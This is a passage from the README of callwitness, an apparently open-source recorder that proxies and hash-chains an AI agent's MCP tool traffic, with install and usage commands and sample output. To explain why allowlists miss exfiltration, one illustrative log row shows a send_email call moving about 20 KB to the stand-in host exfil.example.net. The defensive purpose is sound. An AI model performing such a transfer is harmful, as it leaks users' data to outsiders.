Retrieved article excerpt
Open article · Retrieved 2026-09-21T13:22:14.470329+00:00
callwitness
**Record what your AI agent's tools actually return.**
Forwards every byte. Blocks nothing. Hash-chains the log.
[tests](https://github.com/AditiChaudharyy14/callwitness/actions/workflows/tests.yml)
[PyPI](https://pypi.org/project/callwitness/)
[Python 3.8+](https://pypi.org/project/callwitness/)
[Dependencies: zero](https://camo.githubusercontent.com/c60c09614c8f97cb5b07e69a494f65db8f8b0d1a1a0664c59413db5fa7bc5112/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f646570656e64656e636965732d7a65726f2d313832363436)
[License: MIT](https://github.com/AditiChaudharyy14/callwitness/blob/main/LICENSE)
[Website](https://callwitness.tech) ·
[PyPI](https://pypi.org/project/callwitness/) ·
[Security](https://github.com/AditiChaudharyy14/callwitness/blob/main/SECURITY.md) ·
[Issues](https://github.com/AditiChaudharyy14/callwitness/issues)
A recorder for AI agents. It sits between an agent and its tools, forwards every
byte unchanged, blocks nothing, and hash-chains every record it writes -- so a log
its operator could have edited still proves what happened. Works with any MCP
server today.
No dependencies. Python 3.8+. MIT.
Your agent talks to MCP servers through Callwitness, which forwards every byte unchanged and writes a copy to a hash-chained log on your machine
---
## Thirty seconds
```
pip install callwitness
callwitness demo
```
If `pip` is not a command on your machine, `python -m pip install callwitness`
does the same thing.
If the install finishes with a warning that the script went somewhere **not on
PATH**, the `callwitness` command will not exist. Run it as a module instead --
same tool, same output:
```
python -m callwitness demo
python -m callwitness last
```
No agent, no API key, nothing to configure. It starts a real MCP server through
the recorder, calls the tools that read like reads, refuses the ones that don't,
shows what came back, and tells you where your responses sit against 140 calls
measured across 65 public servers.
```
npx -y @modelcontextprotocol/server-everything declared 8 tools.
6 read like reads; 2 refused by the safety rule and never called.
echo 41 B
get-resource-reference 369 B
get-structured-content 187 B
6 calls recorded. Nothing was blocked, nothing was altered.
Your calls against the public baseline (65 servers, 140 calls)
server-everything/echo 41 B p12 vs same tool 3x smaller
server-everything/get-resource 369 B p61 vs same tool about typical
```
Point it at your own server instead:
```
callwitness demo -- npx -y @your/server
```
---
## The thing it shows you
Same tool. Same permission. Two very different actions:
```
51B send_email [email protected]
20085B send_email exfil.example.net, [email protected]
```
An allowlist cannot tell those apart — the agent is permitted to send email in
both cases. The difference is *how much* is leaving and *where it is going*, and
those are the two signals Callwitness records on every call.
## Why it blocks nothing
Because it should be installable in production on a Tuesday afternoon.
Callwitness cannot corrupt what an agent sends or receives: it relays every message
whether or not it can parse it, and every write to storage is wrapped so a
recorder bug can't reach the stream. That property is tested, not asserted —
see `tests/test_passthrough.py`, which asserts the proxied output is
byte-identical to running the server directly.
**It cannot delay, either.** Observation runs on its own thread behind a bounded
queue, so the relay only ever does a non-blocking hand-off. A deliberately
half-second-slow observer moves the gap between two forwarded messages by 0.05ms
— it used to move it by 4.2 seconds. The queue drops rather than growing without
limit under load, and counts what it dropped: unrecorded data nobody can see is
worse than data that was never collected.
It matters because the security industry is currently writing rules against
agent failures nobody has measured. Enforcement without data is guessing with
extra steps. Collect first.
## Use
Wrap any stdio MCP server:
```
callwitness run --echo -- npx -y @modelcontextprotocol/server-filesystem /data
```
Or let it wrap the servers you already have. It finds your client's config,
shows you exactly what would change, and writes nothing until you say so:
```
$ callwitness install
/Users/you/Library/Application Support/Claude/claude_desktop_config.json
filesystem
- npx -y @modelcontextprotocol/server-filesystem /data
+ callwitness run --label filesystem -- npx -y @modelcontextprotocol/server-filesystem /data
git
- uvx mcp-server-git --repository /repo
+ callwitness run --label git -- uvx mcp-server-git --repository /repo
remote-api SKIPPED: remote server -- needs `callwitness proxy --upstream
https://mcp.acme.com/mcp --port <port>` and a port you choose
2 servers would be wrapped. Nothing has been changed.
```
`--apply` writes it, after a timestamped backup. `callwitness uninstall --apply`
puts everything back. Running install twice does nothing the second time.
Dry-run is the default because this edits a file you did not write and a broken
MCP config means a broken agent — the one outcome this whole tool promises not
to cause. Anything it does not recognise is skipped and named rather than
guessed at.
Knows about Claude Desktop, Cursor, Windsurf, Claude Code, and project-local
`.mcp.json` / `.vscode/mcp.json`. A single config can hold more than one server
map — Claude Code keeps a global one and a separate one per project under
`projects.<path>.mcpServers` — and every one of them is walked. When the answer
is "nothing to wrap", install prints every location it checked, because *no
config exists*, *no servers in it* and *already wrapped* are three different
situations and only one of them means you are finished.
If yours lives somewhere else:
`callwitness install --config /path/to/mcp.json`.
### Remote servers
Production agents mostly talk to remote MCP servers over Streamable HTTP. Put
Callwitness in front of one and point the client at the local address instead:
```
callwitness proxy --upstream https://mcp.example.com/mcp --port 8100 --echo
```
```
{
"mcpServers": {
"example": { "url": "http://127.0.0.1:8100/mcp" }
}
}
```
POST, the SSE response stream, the server-initiated `GET` stream and session
teardown are all relayed verbatim, headers included, so the `Mcp-Session-Id`
handshake works without Callwitness understanding it. Both transports share one
recorder (`CallTracker`), so a row looks the same whichever produced it.
The agent behaves exactly as before. Then look at what it did:
```
callwitness last # what happened in the last run: failures, the biggest responses
callwitness cost --since 7d # what your tools returned, estimated in tokens
callwitness tail --errors # only the calls that failed
callwitness stats # per-tool volume, errors, latency, destinations
callwitness verify # check nothing has been altered since it was written
callwitness export out.jsonl # everything, for analysis
```
### What happened in that run
`stats` answers which tools exist, which is nobody's question. The two people
actually have are *what broke* and *what was enormous*, and both are about one
run rather than every run ever recorded.
```
$ callwitness last
fetch 17 Sep 05:56 -> 06:02 open, idle 1h
2 calls, 0 failed, 71.0 KB returned, 3.4 s in tools
nothing failed
biggest responses
fetch 68.6 KB 2.1 s 17 Sep 06:01
fetch 2.4 KB 1.2 s 17 Sep 06:02
where it went
callwitness.tech 2
Every call: callwitness tail --session 6d4e47f7
```
Failures come first, then the biggest responses, then anything slow that was
not already listed. If nothing failed it says so in one line and moves on.
`callwitness last --runs` lists recent runs, and is careful about what it
claims. A session with no recorded end reads *still running* only while calls
are still arriving; after an hour of silence it reads *open, idle 3d*. That is
the honest form — the process may have been killed, or it may be sitting there
alive and unused, and the record cannot tell you which. Saying *no end
recorded* invited the first conclusion; saying *still running* asserted the
second. Knowing for certain would mean storing a pid and testing liveness, and
on Windows the obvious test terminates the process rather than checking it.
The arrow points at the last call rather than at now, for the same reason:
nothing is known to have happened after it.
Then drill in. `--session` takes the id `last` prints, and matches on a prefix:
```
callwitness tail --session 6d4e47f7
callwitness tail --errors
```
`--errors` is the one worth running on a bad day:
```
13 Sep 08:19 ERR tool_get_definition in=23 out=0 B 16.2 s
13 Sep 08:21 ERR feed in=38 out=0 B 37.3 s
13 Sep 08:25 ERR get_gcores_new in=2 out=0 B 21.2 s
```
Three calls that took between sixteen and thirty-seven seconds to return
nothing. An agent waits that out and moves on without saying anything, and the
same rows sit invisibly in the middle of a 180-row `stats` table. Those three
are from the census sweep of 86 public servers rather than from my own agent --
`--errors` spans the whole database, which is the point of it.
### What it is costing you
The recorder measures bytes because bytes are a fact. Nobody budgets in bytes.
```
$ callwitness cost --since 7d
tool calls returned ~tokens worst call
deepwiki_fetch 3 1.4 MB ~366,246 684.9 KB
list_directory 4 1.0 MB ~251,216 981.3 KB
fetch 5 71.8 KB ~18,374 68.6 KB
... and 130 more tools
total 222 3.8 MB ~1,001,351
```
The ratio is an estimate, it is printed on every run, and it is a flag
(`--bytes-per-token`), because a constant nobody can see is a constant nobody
can correct. Four bytes per token is a middle figure for JSON — worse with
dense punctuation or non-ASCII, better for prose.
Failed calls are excluded: returning nothing costs no context, however long it
took. Those belong in `tail --errors`, where they are.
And it counts what tools returned and nothing else — not the schemas your
client sends at startup, not your prompts, not the model's replies. Someone
will hold this next to their bill, so it says so itself.
### What it cannot see
Callwitness is a proxy for MCP traffic. That is the whole of what it records.
An agent doing work through its own built-in tools is invisible here. Claude
Code, for instance, reads files and runs commands natively and only reaches for
an MCP server when it has no built-in equivalent — so wrapping its servers
records the edges of what it does, not the middle. Agents that are MCP-driven
by construction, which is most custom agents and most Cursor or Windsurf setups
with real servers wired up, are recorded completely.
Direct API calls made inside agent code are the same blind spot and would need
an SDK wrapper, which is deliberately not in v1.
### Where your numbers sit
A recording tells you what happened. It cannot tell you whether what happened is
normal — a number is only unusual relative to something, and on day one your own
history is empty, which is exactly when you are deciding whether this tool is
worth keeping.
```
callwitness baseline --compare
```
```
npm:mcp-deepwiki/deepwiki_fetch 684.9 KB p100 vs same tool 11x the median for this tool
npm:mcp-trends-hub/get_bbc_news 13.5 KB p100 vs same tool high end
npm:@primeng/mcp/version 1.0 KB p100 vs same tool high end
```
The reference is the published census — the